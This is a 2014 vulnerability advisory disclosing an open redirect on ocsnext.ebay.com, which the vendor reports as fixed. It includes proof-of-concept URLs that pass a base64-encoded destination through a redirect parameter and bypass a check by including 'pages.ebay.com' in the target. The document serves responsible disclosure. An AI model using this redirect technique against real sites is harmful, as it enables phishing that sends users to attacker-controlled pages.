Advisory: ocsnext.ebay.com - Open Redirect Advisory ID: SSCHADV2014-005 Author: Stefan Schurtz Affected Software: Successfully tested on ocsnext.ebay.com Vendor URL: http://www.ebay.com/ Vendor Status: fixed ========================== Vulnerability Description ========================== The website ocsnext.ebay.com is prone to open redirect with a special provided url ========================== PoC-Exploit ========================== // open redirect doesn't work // http://www.darksecurity.de/ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0) http://ocsnext.ebay.com/ocs/trk?ocsrelatedhelpurl=aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0&ocsrelatedhelpText=Resolving+transaction+problems+in+the+Resolution+Center // open redirect works http://www.darksecurity.de/pages.ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0) http://ocsnext.ebay.com/ocs/trk?ocsrelatedhelpurl=aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0&ocsrelatedhelpText=Resolving+transaction+problems+in+the+Resolution+Center It seems the string "pages.ebay.com" must be provided in the url thereby the open redirect works ========================== Solution ========================== It seems like ebay fixed the problem without feedback ========================== Disclosure Timeline ========================== 30-Jan-2014 - ebay informed via "http://pages.ebay.com/securitycenter/Researchers.html" ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://www.ebay.com/ http://www.darksecurity.de/advisories/2014/SSCHADV2014-005.txt